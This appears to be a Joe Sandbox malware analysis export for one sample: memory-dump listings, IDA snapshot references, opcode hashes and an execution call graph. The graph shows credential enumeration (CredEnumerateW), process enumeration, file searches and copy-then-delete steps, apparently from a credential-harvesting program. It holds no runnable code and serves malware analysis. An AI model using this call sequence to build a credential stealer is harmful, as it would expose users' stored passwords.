                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                                                                                                                                                              • API String ID: 1872346434-4028850238
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CountInfoInputLastTick
                                                                                                                                                                                                                                                                                                                              • String ID: >G
                                                                                                                                                                                                                                                                                                                              • API String ID: 3478931382-1296849874
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 569d6daaa5662565be238ffc564c13078da4f80c5dbfbbb46f8e554dd6e43052
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7D0127040020DBFCB00DFF5EC4D98D7FBCEB00359F104165A005A2111DB70E6448B14
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                                                                                                                              • String ID: @)|
                                                                                                                                                                                                                                                                                                                              • API String ID: 3253501508-2452551214
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                                                                                                                              • String ID: @)|
                                                                                                                                                                                                                                                                                                                              • API String ID: 3253501508-2452551214
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 15df910850cdcb29e76c73c77be33541a226e090ca5a2204d7be0278f34cd4ad
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 285b3b6625c6ae0c5e1942194dabc0cb358d36ff0f440d737d445859e5505d5d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15df910850cdcb29e76c73c77be33541a226e090ca5a2204d7be0278f34cd4ad
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1B0087CC817009B87489F74A1685447BF0A658A523A05D9AD51683A80D7358066EA50
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                                                                                                                              • String ID: @)|
                                                                                                                                                                                                                                                                                                                              • API String ID: 3253501508-2452551214
                                                                                                                                                                                                                                                                                                                              • Opcode ID: edff418490ac5726873c6b354ad7297f46a89f10ea44c9e928555a22b151cab0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 14936a6ea6eaac552b727b7278c9116a94eaf87052bdbbd0fd93ebf660904ae4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: edff418490ac5726873c6b354ad7297f46a89f10ea44c9e928555a22b151cab0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92B092788013649FEB00AFF089EC86A3FA8B6A92123F02096D501C3320D6340057CF10
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

Execution Graph

Execution Coverage: 6.3%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 1.3%
Total number of Nodes: 2000
Total number of Limit Nodes: 74
38222->38224 38225 40b5c2 LoadResource 38223->38225 38227 40b5e7 38223->38227 38224->38221 38226 40b5d0 SizeofResource LockResource 38225->38226 38225->38227 38226->38227 38227->38224 38235 40afcf 38227->38235 38229 40b608 memcpy 38238 40b4d3 memcpy 38229->38238 38231 40b61e 38239 40b3c1 18 API calls 38231->38239 38233 40b626 38240 40b04b 38233->38240 38236 40b04b ??3@YAXPAX 38235->38236 38237 40afd7 ??2@YAPAXI 38236->38237 38237->38229 38238->38231 38239->38233 38241 40b051 ??3@YAXPAX 38240->38241 38242 40b05f 38240->38242 38241->38242 38242->38224 38243->38108 38245 4032c4 38244->38245 38246 40b633 free 38245->38246 38247 403316 38246->38247 38266 44553b 38247->38266 38251 403480 38464 40368c 15 API calls 38251->38464 38253 403489 38254 40b633 free 38253->38254 38256 403495 38254->38256 38255 40333c 38255->38251 38257 4033a9 memset memcpy 38255->38257 38258 4033ec wcscmp 38255->38258 38462 4028e7 11 API calls 38255->38462 38463 40f508 6 API calls 38255->38463 38256->38110 38257->38255 38257->38258 38258->38255 38261 403421 _wcsicmp 38261->38255 38263 444a64 FreeLibrary 38262->38263 38264 444a83 38262->38264 38263->38264 38264->38110 38265->38111 38267 445548 38266->38267 38268 445599 38267->38268 38465 40c768 38267->38465 38269 4455a8 memset 38268->38269 38276 4457f2 38268->38276 38548 403988 38269->38548 38279 445854 38276->38279 38650 403e2d memset memset memset memset memset 38276->38650 38277 4455e5 38288 445672 38277->38288 38293 44560f 38277->38293 38278 4458bb memset memset 38281 414c2e 17 API calls 38278->38281 38332 4458aa 38279->38332 38673 403c9c memset memset memset memset memset 38279->38673 38284 4458f9 38281->38284 38283 44595e memset memset 38291 414c2e 17 API calls 38283->38291 38292 40b2cc 27 API calls 38284->38292 38286 44558c 38532 444b06 38286->38532 38287 44557a 38287->38286 38746 4136c0 CoTaskMemFree 38287->38746 38559 403fbe memset memset memset memset memset 38288->38559 38289 445a00 memset memset 38696 414c2e 38289->38696 38290 445b22 
38296 445bca 38290->38296 38297 445b38 memset memset memset 38290->38297 38301 44599c 38291->38301 38303 445909 38292->38303 38305 4087b3 338 API calls 38293->38305 38295 445849 38762 40b1ab free free 38295->38762 38304 445c8b memset memset 38296->38304 38370 445cf0 38296->38370 38308 445bd4 38297->38308 38309 445b98 38297->38309 38302 40b2cc 27 API calls 38301->38302 38316 4459ac 38302->38316 38313 409d1f 6 API calls 38303->38313 38317 414c2e 17 API calls 38304->38317 38314 445621 38305->38314 38306 44589f 38763 40b1ab free free 38306->38763 38307 445585 38747 41366b FreeLibrary 38307->38747 38323 414c2e 17 API calls 38308->38323 38309->38308 38319 445ba2 38309->38319 38312 403335 38461 4452e5 45 API calls 38312->38461 38327 445919 38313->38327 38748 4454bf 20 API calls 38314->38748 38315 445823 38315->38295 38337 4087b3 338 API calls 38315->38337 38328 409d1f 6 API calls 38316->38328 38329 445cc9 38317->38329 38835 4099c6 wcslen 38319->38835 38320 4456b2 38750 40b1ab free free 38320->38750 38322 40b2cc 27 API calls 38333 445a4f 38322->38333 38324 445be2 38323->38324 38335 40b2cc 27 API calls 38324->38335 38325 445d3d 38355 40b2cc 27 API calls 38325->38355 38326 445d88 memset memset memset 38338 414c2e 17 API calls 38326->38338 38764 409b98 GetFileAttributesW 38327->38764 38339 4459bc 38328->38339 38340 409d1f 6 API calls 38329->38340 38330 445879 38330->38306 38351 4087b3 338 API calls 38330->38351 38332->38278 38356 44594a 38332->38356 38712 409d1f wcslen wcslen 38333->38712 38345 445bf3 38335->38345 38337->38315 38348 445dde 38338->38348 38831 409b98 GetFileAttributesW 38339->38831 38350 445ce1 38340->38350 38341 445bb3 38838 445403 memset 38341->38838 38342 445680 38342->38320 38582 4087b3 memset 38342->38582 38354 409d1f 6 API calls 38345->38354 38346 445928 38346->38356 38765 40b6ef 38346->38765 38357 40b2cc 27 API calls 38348->38357 38855 409b98 GetFileAttributesW 38350->38855 38351->38330 38353 40b2cc 27 API calls 38362 445a94 38353->38362 38364 445c07 
38354->38364 38365 445d54 _wcsicmp 38355->38365 38356->38283 38369 4459ed 38356->38369 38368 445def 38357->38368 38358 4459cb 38358->38369 38378 40b6ef 253 API calls 38358->38378 38717 40ae18 38362->38717 38363 44566d 38363->38276 38633 413d4c 38363->38633 38374 445389 259 API calls 38364->38374 38375 445d71 38365->38375 38438 445d67 38365->38438 38367 445665 38749 40b1ab free free 38367->38749 38376 409d1f 6 API calls 38368->38376 38369->38289 38369->38290 38370->38312 38370->38325 38370->38326 38371 445389 259 API calls 38371->38296 38380 445c17 38374->38380 38856 445093 23 API calls 38375->38856 38383 445e03 38376->38383 38378->38369 38379 4456d8 38385 40b2cc 27 API calls 38379->38385 38386 40b2cc 27 API calls 38380->38386 38382 44563c 38382->38367 38388 4087b3 338 API calls 38382->38388 38857 409b98 GetFileAttributesW 38383->38857 38384 40b6ef 253 API calls 38384->38312 38390 4456e2 38385->38390 38391 445c23 38386->38391 38387 445d83 38387->38312 38388->38382 38751 413fa6 _wcsicmp _wcsicmp 38390->38751 38395 409d1f 6 API calls 38391->38395 38393 445e12 38400 445e6b 38393->38400 38407 40b2cc 27 API calls 38393->38407 38398 445c37 38395->38398 38396 445aa1 38399 445b17 38396->38399 38414 445ab2 memset 38396->38414 38427 409d1f 6 API calls 38396->38427 38724 40add4 38396->38724 38729 445389 38396->38729 38738 40ae51 38396->38738 38397 4456eb 38403 4456fd memset memset memset memset 38397->38403 38404 4457ea 38397->38404 38405 445389 259 API calls 38398->38405 38832 40aebe 38399->38832 38859 445093 23 API calls 38400->38859 38752 409c70 wcscpy wcsrchr 38403->38752 38755 413d29 38404->38755 38410 445c47 38405->38410 38411 445e33 38407->38411 38408 445e7e 38413 445f67 38408->38413 38416 40b2cc 27 API calls 38410->38416 38417 409d1f 6 API calls 38411->38417 38422 40b2cc 27 API calls 38413->38422 38418 40b2cc 27 API calls 38414->38418 38420 445c53 38416->38420 38421 445e47 38417->38421 38418->38396 38419 409c70 2 API calls 38423 44577e 38419->38423 38424 409d1f 6 API 
calls 38420->38424 38858 409b98 GetFileAttributesW 38421->38858 38426 445f73 38422->38426 38428 409c70 2 API calls 38423->38428 38429 445c67 38424->38429 38431 409d1f 6 API calls 38426->38431 38427->38396 38432 44578d 38428->38432 38433 445389 259 API calls 38429->38433 38430 445e56 38430->38400 38436 445e83 memset 38430->38436 38434 445f87 38431->38434 38432->38404 38440 40b2cc 27 API calls 38432->38440 38433->38296 38862 409b98 GetFileAttributesW 38434->38862 38439 40b2cc 27 API calls 38436->38439 38438->38312 38438->38384 38441 445eab 38439->38441 38442 4457a8 38440->38442 38443 409d1f 6 API calls 38441->38443 38444 409d1f 6 API calls 38442->38444 38445 445ebf 38443->38445 38446 4457b8 38444->38446 38447 40ae18 9 API calls 38445->38447 38754 409b98 GetFileAttributesW 38446->38754 38457 445ef5 38447->38457 38449 4457c7 38449->38404 38451 4087b3 338 API calls 38449->38451 38450 40ae51 9 API calls 38450->38457 38451->38404 38452 445f5c 38454 40aebe FindClose 38452->38454 38453 40add4 2 API calls 38453->38457 38454->38413 38455 40b2cc 27 API calls 38455->38457 38456 409d1f 6 API calls 38456->38457 38457->38450 38457->38452 38457->38453 38457->38455 38457->38456 38459 445f3a 38457->38459 38860 409b98 GetFileAttributesW 38457->38860 38861 445093 23 API calls 38459->38861 38461->38255 38462->38261 38463->38255 38464->38253 38466 40c775 38465->38466 38863 40b1ab free free 38466->38863 38468 40c788 38864 40b1ab free free 38468->38864 38470 40c790 38865 40b1ab free free 38470->38865 38472 40c798 38473 40aa04 free 38472->38473 38474 40c7a0 38473->38474 38866 40c274 memset 38474->38866 38479 40a8ab 9 API calls 38480 40c7c3 38479->38480 38481 40a8ab 9 API calls 38480->38481 38482 40c7d0 38481->38482 38895 40c3c3 38482->38895 38486 40c877 38495 40bdb0 38486->38495 38487 40c86c 38937 4053fe 39 API calls 38487->38937 38493 40c7e5 38493->38486 38493->38487 38494 40c634 50 API calls 38493->38494 38920 40a706 38493->38920 38494->38493 39200 404363 38495->39200 38498 40bf5d 39220 
40440c 38498->39220 38499 40bdee 38499->38498 38503 40b2cc 27 API calls 38499->38503 38500 40bddf CredEnumerateW 38500->38499 38504 40be02 wcslen 38503->38504 38504->38498 38511 40be1e 38504->38511 38505 40be26 wcsncmp 38505->38511 38508 40be7d memset 38509 40bea7 memcpy 38508->38509 38508->38511 38510 40bf11 wcschr 38509->38510 38509->38511 38510->38511 38511->38498 38511->38505 38511->38508 38511->38509 38511->38510 38512 40b2cc 27 API calls 38511->38512 38514 40bf43 LocalFree 38511->38514 39223 40bd5d 28 API calls 38511->39223 39224 404423 38511->39224 38513 40bef6 _wcsnicmp 38512->38513 38513->38510 38513->38511 38514->38511 38515 4135f7 39239 4135e0 38515->39239 38518 40b2cc 27 API calls 38519 41360d 38518->38519 38520 40a804 8 API calls 38519->38520 38521 413613 38520->38521 38522 41361b 38521->38522 38523 41363e 38521->38523 38524 40b273 27 API calls 38522->38524 38525 4135e0 FreeLibrary 38523->38525 38526 413625 GetProcAddress 38524->38526 38527 413643 38525->38527 38526->38523 38528 413648 38526->38528 38527->38287 38529 413658 38528->38529 38530 4135e0 FreeLibrary 38528->38530 38529->38287 38531 413666 38530->38531 38531->38287 39242 4449b9 38532->39242 38535 444c1f 38535->38268 38536 4449b9 42 API calls 38538 444b4b 38536->38538 38537 444c15 38540 4449b9 42 API calls 38537->38540 38538->38537 39263 444972 GetVersionExW 38538->39263 38540->38535 38541 444b99 memcmp 38546 444b8c 38541->38546 38542 444c0b 39267 444a85 42 API calls 38542->39267 38546->38541 38546->38542 39264 444aa5 42 API calls 38546->39264 39265 40a7a0 GetVersionExW 38546->39265 39266 444a85 42 API calls 38546->39266 38549 40399d 38548->38549 39268 403a16 38549->39268 38551 403a09 39282 40b1ab free free 38551->39282 38553 403a12 wcsrchr 38553->38277 38554 4039a3 38554->38551 38557 4039f4 38554->38557 39279 40a02c CreateFileW 38554->39279 38557->38551 38558 4099c6 2 API calls 38557->38558 38558->38551 38560 414c2e 17 API calls 38559->38560 38561 404048 38560->38561 38562 414c2e 17 API calls 
38561->38562 38563 404056 38562->38563 38564 409d1f 6 API calls 38563->38564 38565 404073 38564->38565 38566 409d1f 6 API calls 38565->38566 38567 40408e 38566->38567 38568 409d1f 6 API calls 38567->38568 38569 4040a6 38568->38569 38570 403af5 20 API calls 38569->38570 38571 4040ba 38570->38571 38572 403af5 20 API calls 38571->38572 38573 4040cb 38572->38573 39309 40414f memset 38573->39309 38575 404140 39323 40b1ab free free 38575->39323 38576 4040ec memset 38580 4040e0 38576->38580 38578 404148 38578->38342 38579 4099c6 2 API calls 38579->38580 38580->38575 38580->38576 38580->38579 38581 40a8ab 9 API calls 38580->38581 38581->38580 39336 40a6e6 WideCharToMultiByte 38582->39336 38584 4087ed 39337 4095d9 memset 38584->39337 38587 408809 memset memset memset memset memset 38588 40b2cc 27 API calls 38587->38588 38589 4088a1 38588->38589 38590 409d1f 6 API calls 38589->38590 38591 4088b1 38590->38591 38592 40b2cc 27 API calls 38591->38592 38593 4088c0 38592->38593 38594 409d1f 6 API calls 38593->38594 38595 4088d0 38594->38595 38596 40b2cc 27 API calls 38595->38596 38597 4088df 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 4088ef 38598->38599 38600 40b2cc 27 API calls 38599->38600 38601 4088fe 38600->38601 38602 409d1f 6 API calls 38601->38602 38603 40890e 38602->38603 38604 40b2cc 27 API calls 38603->38604 38605 40891d 38604->38605 38606 409d1f 6 API calls 38605->38606 38607 40892d 38606->38607 39356 409b98 GetFileAttributesW 38607->39356 38609 40893e 38610 408943 38609->38610 38611 408958 38609->38611 38614 408953 38614->38342 38634 40b633 free 38633->38634 38635 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38634->38635 38636 413f00 Process32NextW 38635->38636 38637 413da5 OpenProcess 38636->38637 38638 413f17 CloseHandle 38636->38638 38639 413eb0 38637->38639 38640 413df3 memset 38637->38640 38638->38379 38639->38636 38642 413ebf free 38639->38642 38643 4099f4 3 API calls 38639->38643 39780 413f27 38640->39780 38642->38639 38643->38639 38644 
413e1f 38645 413e37 GetModuleHandleW 38644->38645 39785 413959 38644->39785 39801 413ca4 38644->39801 38645->38644 38647 413e46 GetProcAddress 38645->38647 38647->38644 38649 413ea2 CloseHandle 38649->38639 38651 414c2e 17 API calls 38650->38651 38652 403eb7 38651->38652 38653 414c2e 17 API calls 38652->38653 38654 403ec5 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 403ee2 38655->38656 38657 409d1f 6 API calls 38656->38657 38658 403efd 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 403f15 38659->38660 38661 403af5 20 API calls 38660->38661 38662 403f29 38661->38662 38663 403af5 20 API calls 38662->38663 38664 403f3a 38663->38664 38665 40414f 33 API calls 38664->38665 38671 403f4f 38665->38671 38666 403faf 39815 40b1ab free free 38666->39815 38668 403f5b memset 38668->38671 38669 403fb7 38669->38315 38670 4099c6 2 API calls 38670->38671 38671->38666 38671->38668 38671->38670 38672 40a8ab 9 API calls 38671->38672 38672->38671 38674 414c2e 17 API calls 38673->38674 38675 403d26 38674->38675 38676 414c2e 17 API calls 38675->38676 38677 403d34 38676->38677 38678 409d1f 6 API calls 38677->38678 38679 403d51 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403d6c 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 403d84 38682->38683 38684 403af5 20 API calls 38683->38684 38685 403d98 38684->38685 38686 403af5 20 API calls 38685->38686 38687 403da9 38686->38687 38688 40414f 33 API calls 38687->38688 38689 403dbe 38688->38689 38690 403e1e 38689->38690 38692 403dca memset 38689->38692 38694 4099c6 2 API calls 38689->38694 38695 40a8ab 9 API calls 38689->38695 39816 40b1ab free free 38690->39816 38692->38689 38693 403e26 38693->38330 38694->38689 38695->38689 38697 414b81 9 API calls 38696->38697 38699 414c40 38697->38699 38698 414c73 memset 38701 414c94 38698->38701 38699->38698 39817 409cea 38699->39817 39820 414592 RegOpenKeyExW 38701->39820 38704 414c64 SHGetSpecialFolderPathW 38706 414d0b 38704->38706 38705 414cc1 38707 414cf4 wcscpy 
38705->38707 39821 414bb0 wcscpy 38705->39821 38706->38322 38707->38706 38709 414cd2 39822 4145ac RegQueryValueExW 38709->39822 38711 414ce9 RegCloseKey 38711->38707 38713 409d62 38712->38713 38714 409d43 wcscpy 38712->38714 38713->38353 38715 409719 2 API calls 38714->38715 38716 409d51 wcscat 38715->38716 38716->38713 38718 40aebe FindClose 38717->38718 38719 40ae21 38718->38719 38720 4099c6 2 API calls 38719->38720 38721 40ae35 38720->38721 38722 409d1f 6 API calls 38721->38722 38723 40ae49 38722->38723 38723->38396 38725 40ade0 38724->38725 38728 40ae0f 38724->38728 38726 40ade7 wcscmp 38725->38726 38725->38728 38727 40adfe wcscmp 38726->38727 38726->38728 38727->38728 38728->38396 38730 40ae18 9 API calls 38729->38730 38731 4453c4 38730->38731 38732 40ae51 9 API calls 38731->38732 38733 4453f3 38731->38733 38734 40add4 2 API calls 38731->38734 38737 445403 254 API calls 38731->38737 38732->38731 38735 40aebe FindClose 38733->38735 38734->38731 38736 4453fe 38735->38736 38736->38396 38737->38731 38739 40ae7b FindNextFileW 38738->38739 38740 40ae5c FindFirstFileW 38738->38740 38741 40ae94 38739->38741 38742 40ae8f 38739->38742 38740->38741 38744 40aeb6 38741->38744 38745 409d1f 6 API calls 38741->38745 38743 40aebe FindClose 38742->38743 38743->38741 38744->38396 38745->38744 38746->38307 38747->38286 38748->38382 38749->38363 38750->38363 38751->38397 38753 409c89 38752->38753 38753->38419 38754->38449 38756 413d39 38755->38756 38757 413d2f FreeLibrary 38755->38757 38758 40b633 free 38756->38758 38757->38756 38759 413d42 38758->38759 38760 40b633 free 38759->38760 38761 413d4a 38760->38761 38761->38276 38762->38279 38763->38332 38764->38346 38766 44db70 38765->38766 38767 40b6fc memset 38766->38767 38768 409c70 2 API calls 38767->38768 38769 40b732 wcsrchr 38768->38769 38770 40b743 38769->38770 38771 40b746 memset 38769->38771 38770->38771 38772 40b2cc 27 API calls 38771->38772 38773 40b76f 38772->38773 38774 409d1f 6 API calls 38773->38774 38775 40b783 
38774->38775 39823 409b98 GetFileAttributesW 38775->39823 38777 40b792 38778 40b7c2 38777->38778 38779 409c70 2 API calls 38777->38779 39824 40bb98 38778->39824 38781 40b7a5 38779->38781 38783 40b2cc 27 API calls 38781->38783 38787 40b7b2 38783->38787 38784 40b837 CloseHandle 38786 40b83e memset 38784->38786 38785 40b817 38788 409a45 3 API calls 38785->38788 39857 40a6e6 WideCharToMultiByte 38786->39857 38790 409d1f 6 API calls 38787->38790 38791 40b827 CopyFileW 38788->38791 38790->38778 38791->38786 38792 40b866 38793 444432 121 API calls 38792->38793 38794 40b879 38793->38794 38795 40bad5 38794->38795 38796 40b273 27 API calls 38794->38796 38797 40baeb 38795->38797 38798 40bade DeleteFileW 38795->38798 38799 40b89a 38796->38799 38800 40b04b ??3@YAXPAX 38797->38800 38798->38797 38801 438552 134 API calls 38799->38801 38802 40baf3 38800->38802 38803 40b8a4 38801->38803 38802->38356 38804 40bacd 38803->38804 38806 4251c4 137 API calls 38803->38806 38805 443d90 111 API calls 38804->38805 38805->38795 38829 40b8b8 38806->38829 38807 40bac6 39867 424f26 123 API calls 38807->39867 38808 40b8bd memset 39858 425413 17 API calls 38808->39858 38811 425413 17 API calls 38811->38829 38814 40a71b MultiByteToWideChar 38814->38829 38815 40a734 MultiByteToWideChar 38815->38829 38818 40b9b5 memcmp 38818->38829 38819 4099c6 2 API calls 38819->38829 38820 404423 38 API calls 38820->38829 38823 40bb3e memset memcpy 39868 40a734 MultiByteToWideChar 38823->39868 38824 4251c4 137 API calls 38824->38829 38826 40bb88 LocalFree 38826->38829 38829->38807 38829->38808 38829->38811 38829->38814 38829->38815 38829->38818 38829->38819 38829->38820 38829->38823 38829->38824 38830 40ba5f memcmp 38829->38830 39859 4253ef 16 API calls 38829->39859 39860 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38829->39860 39861 4253af 17 API calls 38829->39861 39862 4253cf 17 API calls 38829->39862 39863 447280 memset 38829->39863 39864 447960 memset memcpy memcpy memcpy 38829->39864 39865 40afe8 
